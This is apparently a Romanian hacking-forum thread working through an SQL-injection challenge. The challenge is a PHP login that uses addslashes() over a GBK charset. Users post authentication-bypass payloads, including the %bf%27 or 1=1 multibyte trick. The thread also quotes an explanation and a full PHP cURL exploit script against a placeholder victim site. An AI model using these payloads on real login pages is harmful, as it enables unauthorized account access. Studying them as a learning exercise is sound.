SQLI Challenge 1

[Hertz]

Se da codul sursa al unei pagini.

Care ar fii queryul ideal pentru extragerea datelor / logarea ca Admin.

<?php

function asvsmysql_login($username, $password)
{
	$username = addslashes($username);
	$password = md5($password);

	$db = new Database();
	$db->setHost('localhost');
	$db->setDatabase(ADDSLASH_DATABASE);
	$db->setUser(ADDSLASH_USERNAME);
	$db->setPassword(ADDSLASH_PASSWORD);
	if (false === $db->connect()) {
		return htmlDisplayError('Conectare nereusita.');
	}

	$db->query("SET NAMES GBK");
	$db->query("SET CHARACTER SET GBK");

	$query = "SELECT username FROM users WHERE username='$username' AND password='$password'";

	if (false === ($result = $db->queryFirst($query))) {
		return htmlDisplayError('User/Parola gresite..');
	}

	if ($result['username'] !== 'Admin') {
		return htmlDisplayError('Esti logat,dar nu ca Admin.');
	}

	return htmlDisplayMessage('Esti logat,felicitari!');
}

?>

[ZeroCold]

SELECT username FROM admin WHERE username='$username' AND password='$password' --

???(nus sigur ) )...

[Nytro]

username='$username' si password='$password' - Nu trebuia cumva sa folosesti ghilimele duble?

Si nu vad cum s-ar putea apela functia din browser... Sa presupunem ca folosim GET pentru username si password:

username=Admin

password=' OR 1=1'

Ceva de genul. Login bypass.

Edit: Nu e bine, nu m-am uitat la inceput.

Edited October 7, 2009 by Nytro

[loki]

misto ideea.

Tentant ar fi de construit un site simplu cu codul de mai sus... dar presupun ca aflarea solutiei presupune doar citirea codului?

...

m-as baga mai tarziu (da nu stiu daca am timp azi) sa bag pe un host sursa, o baza de date si sa ofer situl pentru incercari. Imi place ideea.

PS cred ca voiai sa zici ' OR 1 OR ' sau ' OR 1=1 OR '

[Hertz]

L-as pune sus daca as avea unde.

Anyway.

Acest challenge tine numai si numai de addslashes

[michee]

se foloseste faptul ca-i charset-ul GBK si se face escape cu addslashes.

apoi cred ca se poate injecta blind....asa la o prima privire

[ZeroCold]

SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR ')

:D:D

[Hertz]

LOL asdf

[Nytro]

$username = "Admin--" ?

Edit: Nu...

[ioinel]

Challenge: Addslashes

[Nytro]

Dar nici nu trebuia sa fie facut de el. Nu conteaza de cine e facut.

[michee]

se baga asa %bf%27 or 1=1 /**

pe site-ul original imi apare you're logged in but not as Admin!

[ioinel]

nytro, stiu. am postat site-ul doar ca sa poata toti sa testeze acolo. are cineva un link cu tutorial la vulnerabilitatea aia?

[loki]

am incercat destule, intr-adevar ideea ar fi sa ajungi la query gen

FROM users WHERE username='admin' OR 1 OR 'ceva' AND password=''";

addslashes iti transforma '\ si se pare ca singura metoda viabila este utilizatul caracterelor de UTF8 (situl e intr-o limba asiatica deci primeste, cum a zis michee)

Problema e ca mi-au esuat toate incercarile, trebuie testat programul separat, din ochi la cea mai mica greseala se comporta la fel.

[ioinel]

Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc.

SQL Injection - Hakipedia

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:

<?php
$url     = "http://www.victimsite.com/login.php";
$ref     = "http://www.victimsite.com/index.php";
$session = "PHPSESSID=abcdefg01234567890abcdefg";

$ch      = curl_init();

curl_setopt( $ch, CURLOPT_URL,            $url     );
curl_setopt( $ch, CURLOPT_REFERER,        $ref     );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE     );
curl_setopt( $ch, CURLOPT_COOKIE,         $session );
curl_setopt( $ch, CURLOPT_POST,           TRUE     );
curl_setopt( $ch, CURLOPT_POSTFIELDS,     "username=" .
                                          chr(0xbf) . chr(0x27) .
                                          "OR 1=1/*&submit=1" );

$data = curl_exec( $ch );

print( $data );
curl_close( $ch );
?>

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.